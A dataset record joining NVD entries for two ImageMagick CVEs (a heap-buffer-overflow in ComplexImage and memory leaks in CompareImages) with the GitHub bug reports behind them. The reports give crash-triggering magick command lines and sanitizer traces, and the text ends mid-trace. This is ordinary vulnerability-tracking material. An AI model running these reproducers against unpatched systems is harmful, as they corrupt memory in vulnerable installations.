| heap-buffer-overflow at MagickCore/statistic.c:559:43 in EvaluateImages | https://api.github.com/repos/ImageMagick/ImageMagick/issues/1615/comments | 6 | 2019-06-22T02:11:22Z | 2019-08-10T11:30:08Z | https://github.com/ImageMagick/ImageMagick/issues/1615 | 459,421,750 | 1,615 |
CVE-2019-13308 | 2019-07-05T01:15:10.750 | ImageMagick 7.0.8-50 Q16 has a heap-based buffer overflow in MagickCore/fourier.c in ComplexImage. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.8,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "[email protected]",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 5.9,
"source": "[email protected]",
"type": "Primary"
}
]
} | [
{
"source": "[email protected]",
"tags": [
"Third Party Advisory"
],
"url": "http://lists.opensuse.org/opensuse-security-announce/2019-08/msg00069.html"
},
{
"source": "[email protected]",
"tags": [
"Patch"
],
"url": "https://github.com/ImageMagick/ImageMagick/commit/61135001a625364e29bdce83832f043eebde7b5a"
},
{
"source": "[email protected]",
"tags": [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/ImageMagick/ImageMagick/issues/1595"
},
{
"source": "[email protected]",
"tags": [
"Patch"
],
"url": "https://github.com/ImageMagick/ImageMagick6/commit/19651f3db63fa1511ed83a348c4c82fa553f8d01"
},
{
"source": "[email protected]",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "https://lists.debian.org/debian-lts-announce/2020/09/msg00007.html"
},
{
"source": "[email protected]",
"tags": [
"Third Party Advisory"
],
"url": "https://usn.ubuntu.com/4192-1/"
},
{
"source": "[email protected]",
"tags": [
"Third Party Advisory"
],
"url": "https://www.debian.org/security/2020/dsa-4712"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:imagemagick:imagemagick:7.0.8-50:q16:*:*:*:*:*:*",
"matchCriteriaId": "25CCEA99-8329-46C6-9625-4FE15F24CF69",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:esm:*:*:*",
"matchCriteriaId": "7A5301BF-1402-4BE0-A0F8-69FBE79BC6D6",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:canonical:ubuntu_linux:18.04:*:*:*:lts:*:*:*",
"matchCriteriaId": "23A7C53F-B80F-4E6A-AFA9-58EEA84BE11D",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:canonical:ubuntu_linux:19.04:*:*:*:*:*:*:*",
"matchCriteriaId": "CD783B0C-9246-47D9-A937-6144FE8BFF0F",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:canonical:ubuntu_linux:19.10:*:*:*:*:*:*:*",
"matchCriteriaId": "A31C8344-3E02-4EB8-8BD8-4C84B7959624",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*",
"matchCriteriaId": "DEECE5FC-CACF-4496-A3E7-164736409252",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*",
"matchCriteriaId": "07B237A9-69A3-4A9C-9DA0-4E06BD37AE73",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:opensuse:leap:15.0:*:*:*:*:*:*:*",
"matchCriteriaId": "F1E78106-58E6-4D59-990F-75DA575BFAD9",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:opensuse:leap:15.1:*:*:*:*:*:*:*",
"matchCriteriaId": "B620311B-34A3-48A6-82DF-6F078D7A4493",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | https://github.com/ImageMagick/ImageMagick/issues/1595 | [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
] | github.com | [
"ImageMagick",
"ImageMagick"
] | ### Prerequisites
- [x] I have written a descriptive issue title
- [x] I have verified that I am using the latest version of ImageMagick
- [x] I have searched [open](https://github.com/ImageMagick/ImageMagick/issues) and [closed](https://github.com/ImageMagick/ImageMagick/issues?q=is%3Aissue+is%3Aclosed) issues to ensure it has not already been reported
### Description
<!-- A description of the bug or feature -->
There's a heap-buffer-overflow in MagickCore/fourier.c:299:18 in ComplexImage, and I compiled the lasted version with --disable-openmp option.
### Steps to Reproduce
<!-- List of steps, sample code, failing test or link to a project that reproduces the behavior.
Make sure you place a stack trace inside a code (```) block to avoid linking unrelated issues -->
run cmd:
`magick -seed 0 -mattecolor rgb"("225,230,14")" -debug Configure "(" magick:wizard +repage ")" "(" magick:netscape +repage ")" -fuzz 82 -caption "j$Y%Be" -blue-primary 727,475 -crop 405%-43-16 -crop 832x886>+11-13 -complex magnitude-phase tmp`
and also this command
`magick -seed 0 "(" magick:netscape +repage ")" "(" magick:wizard -resample 24x44 -resample 47x83 ")" "(" magick:netscape -charcoal 4 -random-threshold 42x71 -shade 81x21 ")" -complex magnitude-phase tmp112
`
Here's ASAN result.
```
==9231==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x7fd97efce800 at pc 0x7fd98dbdd221 bp 0x7ffff99e9790 sp 0x7ffff99e9788
WRITE of size 4 at 0x7fd97efce800 thread T0
#0 0x7fd98dbdd220 in ComplexImages MagickCore/fourier.c:299:18
#1 0x7fd98d4038c1 in CLIListOperatorImages MagickWand/operation.c:3890:22
#2 0x7fd98d40f34e in CLIOption MagickWand/operation.c:5276:14
#3 0x7fd98d250a99 in ProcessCommandOptions MagickWand/magick-cli.c:477:7
#4 0x7fd98d251d0a in MagickImageCommand MagickWand/magick-cli.c:796:5
#5 0x7fd98d29bba1 in MagickCommandGenesis MagickWand/mogrify.c:185:14
#6 0x526f95 in MagickMain utilities/magick.c:149:10
#7 0x5268e1 in main utilities/magick.c:180:10
#8 0x7fd987d12b96 in __libc_start_main /build/glibc-OTsEL5/glibc-2.27/csu/../csu/libc-start.c:310
#9 0x41b069 in _start (install/bin/magick+0x41b069)
0x7fd97efce800 is located 0 bytes to the right of 3686400-byte region [0x7fd97ec4a800,0x7fd97efce800)
allocated by thread T0 here:
#0 0x4e6200 in __interceptor_posix_memalign (install/bin/magick+0x4e6200)
#1 0x7fd98dc8a666 in AcquireAlignedMemory MagickCore/memory.c:265:7
#2 0x7fd98d9d36ac in OpenPixelCache MagickCore/cache.c:3728:46
#3 0x7fd98d9d9991 in GetImagePixelCache MagickCore/cache.c:1754:18
#4 0x7fd98d9dfc59 in SyncImagePixelCache MagickCore/cache.c:5494:28
#5 0x7fd98dc3dfc1 in SetImageStorageClass MagickCore/image.c:2627:10
#6 0x7fd98dbdb4f7 in ComplexImages MagickCore/fourier.c:185:7
#7 0x7fd98d4038c1 in CLIListOperatorImages MagickWand/operation.c:3890:22
#8 0x7fd98d40f34e in CLIOption MagickWand/operation.c:5276:14
#9 0x7fd98d250a99 in ProcessCommandOptions MagickWand/magick-cli.c:477:7
#10 0x7fd98d251d0a in MagickImageCommand MagickWand/magick-cli.c:796:5
#11 0x7fd98d29bba1 in MagickCommandGenesis MagickWand/mogrify.c:185:14
#12 0x526f95 in MagickMain utilities/magick.c:149:10
#13 0x5268e1 in main utilities/magick.c:180:10
#14 0x7fd987d12b96 in __libc_start_main /build/glibc-OTsEL5/glibc-2.27/csu/../csu/libc-start.c:310
SUMMARY: AddressSanitizer: heap-buffer-overflow MagickCore/fourier.c:299:18 in ComplexImages
```
### System Configuration
<!-- Tell us about the environment where you are experiencing the bug -->
- ImageMagick version:
Version: ImageMagick 7.0.8-50 Q16 x86_64 2019-06-17 https://imagemagick.org
- Environment (Operating system, version and so on):
Description: Ubuntu 18.04.1 LTS
Release: 18.04
Codename: bionic
- Additional information:
CC=clang-7 CXX=clang++-7 ./configure --disable-openmp
<!-- Thanks for reporting the issue to ImageMagick! -->
| heap-buffer-overflow in MagickCore/fourier.c:299:18 in ComplexImage | https://api.github.com/repos/ImageMagick/ImageMagick/issues/1595/comments | 3 | 2019-06-17T02:21:01Z | 2019-08-13T11:59:01Z | https://github.com/ImageMagick/ImageMagick/issues/1595 | 456,713,579 | 1,595 |
CVE-2019-13309 | 2019-07-05T01:15:10.813 | ImageMagick 7.0.8-50 Q16 has memory leaks at AcquireMagickMemory because of mishandling the NoSuchImage error in CLIListOperatorImages in MagickWand/operation.c. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "[email protected]",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 3.6,
"source": "[email protected]",
"type": "Primary"
}
]
} | [
{
"source": "[email protected]",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "http://lists.opensuse.org/opensuse-security-announce/2019-08/msg00069.html"
},
{
"source": "[email protected]",
"tags": [
"Patch"
],
"url": "https://github.com/ImageMagick/ImageMagick/commit/5f21230b657ccd65452dd3d94c5b5401ba691a2d"
},
{
"source": "[email protected]",
"tags": [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/ImageMagick/ImageMagick/issues/1616"
},
{
"source": "[email protected]",
"tags": [
"Patch"
],
"url": "https://github.com/ImageMagick/ImageMagick6/commit/5982632109cad48bc6dab867298fdea4dea57c51"
},
{
"source": "[email protected]",
"tags": [
"Third Party Advisory"
],
"url": "https://usn.ubuntu.com/4192-1/"
},
{
"source": "[email protected]",
"tags": [
"Third Party Advisory"
],
"url": "https://www.debian.org/security/2020/dsa-4712"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:imagemagick:imagemagick:7.0.8-50:q16:*:*:*:*:*:*",
"matchCriteriaId": "25CCEA99-8329-46C6-9625-4FE15F24CF69",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*",
"matchCriteriaId": "07B237A9-69A3-4A9C-9DA0-4E06BD37AE73",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:esm:*:*:*",
"matchCriteriaId": "7A5301BF-1402-4BE0-A0F8-69FBE79BC6D6",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:canonical:ubuntu_linux:18.04:*:*:*:lts:*:*:*",
"matchCriteriaId": "23A7C53F-B80F-4E6A-AFA9-58EEA84BE11D",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:canonical:ubuntu_linux:19.04:*:*:*:*:*:*:*",
"matchCriteriaId": "CD783B0C-9246-47D9-A937-6144FE8BFF0F",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:canonical:ubuntu_linux:19.10:*:*:*:*:*:*:*",
"matchCriteriaId": "A31C8344-3E02-4EB8-8BD8-4C84B7959624",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:opensuse:leap:15.0:*:*:*:*:*:*:*",
"matchCriteriaId": "F1E78106-58E6-4D59-990F-75DA575BFAD9",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:opensuse:leap:15.1:*:*:*:*:*:*:*",
"matchCriteriaId": "B620311B-34A3-48A6-82DF-6F078D7A4493",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | https://github.com/ImageMagick/ImageMagick/issues/1616 | [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
] | github.com | [
"ImageMagick",
"ImageMagick"
] | ### Prerequisites
- [x] I have written a descriptive issue title
- [x] I have verified that I am using the latest version of ImageMagick
- [x] I have searched [open](https://github.com/ImageMagick/ImageMagick/issues) and [closed](https://github.com/ImageMagick/ImageMagick/issues?q=is%3Aissue+is%3Aclosed) issues to ensure it has not already been reported
### Description
<!-- A description of the bug or feature -->
There's memory leaks in MagickCore/memory.c:478:10
This issue is maybe related with [#1604](https://github.com/ImageMagick/ImageMagick/issues/1604).
### Steps to Reproduce
<!-- List of steps, sample code, failing test or link to a project that reproduces the behavior.
Make sure you place a stack trace inside a code (```) block to avoid linking unrelated issues -->
run_cmd:
`magick -seed 0 -quality 3 "(" magick:logo +repage ")" "(" magick:wizard +repage ")" -quiet -caption "%h%U" -compare -insert 2 tmp`
Here's ASAN log.
```
==22113==ERROR: LeakSanitizer: detected memory leaks
Direct leak of 13504 byte(s) in 1 object(s) allocated from:
#0 0x4e5397 in __interceptor_malloc (install/bin/magick+0x4e5397)
#1 0x7f9c4c438106 in AcquireMagickMemory MagickCore/memory.c:478:10
#2 0x7f9c4c3e5114 in AcquireCriticalMemory ./MagickCore/memory-private.h:64:10
#3 0x7f9c4c3e96c9 in CloneImage MagickCore/image.c:823:25
#4 0x7f9c4c5e8885 in ExtentImage MagickCore/transform.c:1134:16
#5 0x7f9c4c1c5d00 in CompareImages MagickCore/compare.c:188:20
#6 0x7f9c4bbb06f1 in CLIListOperatorImages MagickWand/operation.c:3880:22
#7 0x7f9c4bbbc35e in CLIOption MagickWand/operation.c:5279:14
#8 0x7f9c4b9fda99 in ProcessCommandOptions MagickWand/magick-cli.c:477:7
#9 0x7f9c4b9fed0a in MagickImageCommand MagickWand/magick-cli.c:796:5
#10 0x7f9c4ba48ba1 in MagickCommandGenesis MagickWand/mogrify.c:185:14
#11 0x526f95 in MagickMain utilities/magick.c:149:10
#12 0x5268e1 in main utilities/magick.c:180:10
#13 0x7f9c464bfb96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96)
Indirect leak of 6553600 byte(s) in 1 object(s) allocated from:
#0 0x4e6200 in __interceptor_posix_memalign (install/bin/magick+0x4e6200)
#1 0x7f9c4c437f26 in AcquireAlignedMemory MagickCore/memory.c:265:7
#2 0x7f9c4c18061c in OpenPixelCache MagickCore/cache.c:3728:46
#3 0x7f9c4c186901 in GetImagePixelCache MagickCore/cache.c:1754:18
#4 0x7f9c4c16e330 in QueueAuthenticPixelCacheNexus MagickCore/cache.c:4156:28
#5 0x7f9c4c16e001 in GetAuthenticPixelCacheNexus MagickCore/cache.c:1324:10
#6 0x7f9c4c1909be in GetCacheViewAuthenticPixels MagickCore/cache-view.c:312:10
#7 0x7f9c4c3f83a1 in SetImageAlpha MagickCore/image.c:2372:7
#8 0x7f9c4c479695 in ConformPixelInfo MagickCore/pixel.c:235:12
#9 0x7f9c4c3ec4a7 in SetImageBackgroundColor MagickCore/image.c:2441:3
#10 0x7f9c4c5e88b5 in ExtentImage MagickCore/transform.c:1138:10
#11 0x7f9c4c1c5d00 in CompareImages MagickCore/compare.c:188:20
#12 0x7f9c4bbb06f1 in CLIListOperatorImages MagickWand/operation.c:3880:22
#13 0x7f9c4bbbc35e in CLIOption MagickWand/operation.c:5279:14
#14 0x7f9c4b9fda99 in ProcessCommandOptions MagickWand/magick-cli.c:477:7
#15 0x7f9c4b9fed0a in MagickImageCommand MagickWand/magick-cli.c:796:5
#16 0x7f9c4ba48ba1 in MagickCommandGenesis MagickWand/mogrify.c:185:14
#17 0x526f95 in MagickMain utilities/magick.c:149:10
#18 0x5268e1 in main utilities/magick.c:180:10
#19 0x7f9c464bfb96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96)
Indirect leak of 22616 byte(s) in 1 object(s) allocated from:
#0 0x4e5397 in __interceptor_malloc (install/bin/magick+0x4e5397)
#1 0x7f9c4c438106 in AcquireMagickMemory MagickCore/memory.c:478:10
#2 0x7f9c4c43816f in AcquireQuantumMemory MagickCore/memory.c:551:10
#3 0x7f9c4c3eaafd in CloneImage MagickCore/image.c:879:43
#4 0x7f9c4c5e8885 in ExtentImage MagickCore/transform.c:1134:16
#5 0x7f9c4c1c5d00 in CompareImages MagickCore/compare.c:188:20
#6 0x7f9c4bbb06f1 in CLIListOperatorImages MagickWand/operation.c:3880:22
#7 0x7f9c4bbbc35e in CLIOption MagickWand/operation.c:5279:14
#8 0x7f9c4b9fda99 in ProcessCommandOptions MagickWand/magick-cli.c:477:7
#9 0x7f9c4b9fed0a in MagickImageCommand MagickWand/magick-cli.c:796:5
#10 0x7f9c4ba48ba1 in MagickCommandGenesis MagickWand/mogrify.c:185:14
#11 0x526f95 in MagickMain utilities/magick.c:149:10
#12 0x5268e1 in main utilities/magick.c:180:10
#13 0x7f9c464bfb96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96)
Indirect leak of 13024 byte(s) in 1 object(s) allocated from:
#0 0x4e5397 in __interceptor_malloc (install/bin/magick+0x4e5397)
#1 0x7f9c4c438106 in AcquireMagickMemory MagickCore/memory.c:478:10
#2 0x7f9c4c3e5114 in AcquireCriticalMemory ./MagickCore/memory-private.h:64:10
#3 0x7f9c4c3e7753 in AcquireImageInfo MagickCore/image.c:350:28
#4 0x7f9c4c3f0513 in CloneImageInfo MagickCore/image.c:945:14
#5 0x7f9c4c3e7678 in SyncImageSettings MagickCore/image.c:4242:21
#6 0x7f9c4c3fee66 in SyncImagesSettings MagickCore/image.c:4000:12
#7 0x7f9c4bbbc163 in CLIOption MagickWand/operation.c:5246:14
#8 0x7f9c4b9fda99 in ProcessCommandOptions MagickWand/magick-cli.c:477:7
#9 0x7f9c4b9fed0a in MagickImageCommand MagickWand/magick-cli.c:796:5
#10 0x7f9c4ba48ba1 in MagickCommandGenesis MagickWand/mogrify.c:185:14
#11 0x526f95 in MagickMain utilities/magick.c:149:10
#12 0x5268e1 in main utilities/magick.c:180:10
#13 0x7f9c464bfb96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96)
Indirect leak of 9152 byte(s) in 1 object(s) allocated from:
#0 0x4e6200 in __interceptor_posix_memalign (install/bin/magick+0x4e6200)
#1 0x7f9c4c437f26 in AcquireAlignedMemory MagickCore/memory.c:265:7
#2 0x7f9c4c16aa04 in AcquirePixelCache MagickCore/cache.c:195:28
#3 0x7f9c4c16bf8d in ClonePixelCache MagickCore/cache.c:513:28
#4 0x7f9c4c3eb59f in CloneImage MagickCore/image.c:910:22
#5 0x7f9c4c5e8885 in ExtentImage MagickCore/transform.c:1134:16
#6 0x7f9c4c1c5d00 in CompareImages MagickCore/compare.c:188:20
#7 0x7f9c4bbb06f1 in CLIListOperatorImages MagickWand/operation.c:3880:22
#8 0x7f9c4bbbc35e in CLIOption MagickWand/operation.c:5279:14
#9 0x7f9c4b9fda99 in ProcessCommandOptions MagickWand/magick-cli.c:477:7
#10 0x7f9c4b9fed0a in MagickImageCommand MagickWand/magick-cli.c:796:5
#11 0x7f9c4ba48ba1 in MagickCommandGenesis MagickWand/mogrify.c:185:14
#12 0x526f95 in MagickMain utilities/magick.c:149:10
#13 0x5268e1 in main utilities/magick.c:180:10
#14 0x7f9c464bfb96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96)
Indirect leak of 512 byte(s) in 1 object(s) allocated from:
#0 0x4e5397 in __interceptor_malloc (install/bin/magick+0x4e5397)
#1 0x7f9c4c438106 in AcquireMagickMemory MagickCore/memory.c:478:10
#2 0x7f9c4c43816f in AcquireQuantumMemory MagickCore/memory.c:551:10
#3 0x7f9c4c478f3a in AcquirePixelChannelMap MagickCore/pixel.c:101:35
#4 0x7f9c4c479114 in ClonePixelChannelMap MagickCore/pixel.c:139:13
#5 0x7f9c4c3ea34f in CloneImage MagickCore/image.c:849:28
#6 0x7f9c4c5e8885 in ExtentImage MagickCore/transform.c:1134:16
#7 0x7f9c4c1c5d00 in CompareImages MagickCore/compare.c:188:20
#8 0x7f9c4bbb06f1 in CLIListOperatorImages MagickWand/operation.c:3880:22
#9 0x7f9c4bbbc35e in CLIOption MagickWand/operation.c:5279:14
#10 0x7f9c4b9fda99 in ProcessCommandOptions MagickWand/magick-cli.c:477:7
#11 0x7f9c4b9fed0a in MagickImageCommand MagickWand/magick-cli.c:796:5
#12 0x7f9c4ba48ba1 in MagickCommandGenesis MagickWand/mogrify.c:185:14
#13 0x526f95 in MagickMain utilities/magick.c:149:10
#14 0x5268e1 in main utilities/magick.c:180:10
#15 0x7f9c464bfb96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96)
Indirect leak of 288 byte(s) in 1 object(s) allocated from:
#0 0x4e5397 in __interceptor_malloc (install/bin/magick+0x4e5397)
#1 0x7f9c4c438106 in AcquireMagickMemory MagickCore/memory.c:478:10
#2 0x7f9c4c148284 in AcquireCriticalMemory ./MagickCore/memory-private.h:64:10
#3 0x7f9c4c149d5d in CloneBlobInfo MagickCore/blob.c:554:27
#4 0x7f9c4c3ea808 in CloneImage MagickCore/image.c:867:25
#5 0x7f9c4c5e8885 in ExtentImage MagickCore/transform.c:1134:16
#6 0x7f9c4c1c5d00 in CompareImages MagickCore/compare.c:188:20
#7 0x7f9c4bbb06f1 in CLIListOperatorImages MagickWand/operation.c:3880:22
#8 0x7f9c4bbbc35e in CLIOption MagickWand/operation.c:5279:14
#9 0x7f9c4b9fda99 in ProcessCommandOptions MagickWand/magick-cli.c:477:7
#10 0x7f9c4b9fed0a in MagickImageCommand MagickWand/magick-cli.c:796:5
#11 0x7f9c4ba48ba1 in MagickCommandGenesis MagickWand/mogrify.c:185:14
#12 0x526f95 in MagickMain utilities/magick.c:149:10
#13 0x5268e1 in main utilities/magick.c:180:10
#14 0x7f9c464bfb96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96)
Indirect leak of 192 byte(s) in 1 object(s) allocated from:
#0 0x4e5397 in __interceptor_malloc (install/bin/magick+0x4e5397)
#1 0x7f9c4c438106 in AcquireMagickMemory MagickCore/memory.c:478:10
#2 0x7f9c4c43816f in AcquireQuantumMemory MagickCore/memory.c:551:10
#3 0x7f9c4c16b5df in AcquirePixelCacheNexus MagickCore/cache.c:271:29
#4 0x7f9c4c16af8d in AcquirePixelCache MagickCore/cache.c:212:26
#5 0x7f9c4c16bf8d in ClonePixelCache MagickCore/cache.c:513:28
#6 0x7f9c4c3eb59f in CloneImage MagickCore/image.c:910:22
#7 0x7f9c4c5e8885 in ExtentImage MagickCore/transform.c:1134:16
#8 0x7f9c4c1c5d00 in CompareImages MagickCore/compare.c:188:20
#9 0x7f9c4bbb06f1 in CLIListOperatorImages MagickWand/operation.c:3880:22
#10 0x7f9c4bbbc35e in CLIOption MagickWand/operation.c:5279:14
#11 0x7f9c4b9fda99 in ProcessCommandOptions MagickWand/magick-cli.c:477:7
#12 0x7f9c4b9fed0a in MagickImageCommand MagickWand/magick-cli.c:796:5
#13 0x7f9c4ba48ba1 in MagickCommandGenesis MagickWand/mogrify.c:185:14
#14 0x526f95 in MagickMain utilities/magick.c:149:10
#15 0x5268e1 in main utilities/magick.c:180:10
#16 0x7f9c464bfb96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96)
Indirect leak of 96 byte(s) in 3 object(s) allocated from:
#0 0x4e5397 in __interceptor_malloc (install/bin/magick+0x4e5397)
#1 0x7f9c4c438106 in AcquireMagickMemory MagickCore/memory.c:478:10
#2 0x7f9c4c593033 in AddValueToSplayTree MagickCore/splay-tree.c:189:21
#3 0x7f9c4c593f3c in CloneSplayTree MagickCore/splay-tree.c:372:12
#4 0x7f9c4c4c8ee3 in CloneImageProperties MagickCore/property.c:196:25
#5 0x7f9c4c3e9f59 in CloneImage MagickCore/image.c:839:10
#6 0x7f9c4c5e8885 in ExtentImage MagickCore/transform.c:1134:16
#7 0x7f9c4c1c5d00 in CompareImages MagickCore/compare.c:188:20
#8 0x7f9c4bbb06f1 in CLIListOperatorImages MagickWand/operation.c:3880:22
#9 0x7f9c4bbbc35e in CLIOption MagickWand/operation.c:5279:14
#10 0x7f9c4b9fda99 in ProcessCommandOptions MagickWand/magick-cli.c:477:7
#11 0x7f9c4b9fed0a in MagickImageCommand MagickWand/magick-cli.c:796:5
#12 0x7f9c4ba48ba1 in MagickCommandGenesis MagickWand/mogrify.c:185:14
#13 0x526f95 in MagickMain utilities/magick.c:149:10
#14 0x5268e1 in main utilities/magick.c:180:10
#15 0x7f9c464bfb96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96)
Indirect leak of 88 byte(s) in 1 object(s) allocated from:
#0 0x4e5397 in __interceptor_malloc (install/bin/magick+0x4e5397)
#1 0x7f9c4c438106 in AcquireMagickMemory MagickCore/memory.c:478:10
#2 0x7f9c4c598084 in AcquireCriticalMemory ./MagickCore/memory-private.h:64:10
#3 0x7f9c4c594115 in NewSplayTree MagickCore/splay-tree.c:1148:32
#4 0x7f9c4c593d24 in CloneSplayTree MagickCore/splay-tree.c:360:14
#5 0x7f9c4c4c8ee3 in CloneImageProperties MagickCore/property.c:196:25
#6 0x7f9c4c3e9f59 in CloneImage MagickCore/image.c:839:10
#7 0x7f9c4c5e8885 in ExtentImage MagickCore/transform.c:1134:16
#8 0x7f9c4c1c5d00 in CompareImages MagickCore/compare.c:188:20
#9 0x7f9c4bbb06f1 in CLIListOperatorImages MagickWand/operation.c:3880:22
#10 0x7f9c4bbbc35e in CLIOption MagickWand/operation.c:5279:14
#11 0x7f9c4b9fda99 in ProcessCommandOptions MagickWand/magick-cli.c:477:7
#12 0x7f9c4b9fed0a in MagickImageCommand MagickWand/magick-cli.c:796:5
#13 0x7f9c4ba48ba1 in MagickCommandGenesis MagickWand/mogrify.c:185:14
#14 0x526f95 in MagickMain utilities/magick.c:149:10
#15 0x5268e1 in main utilities/magick.c:180:10
#16 0x7f9c464bfb96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96)
Indirect leak of 88 byte(s) in 1 object(s) allocated from:
#0 0x4e5397 in __interceptor_malloc (install/bin/magick+0x4e5397)
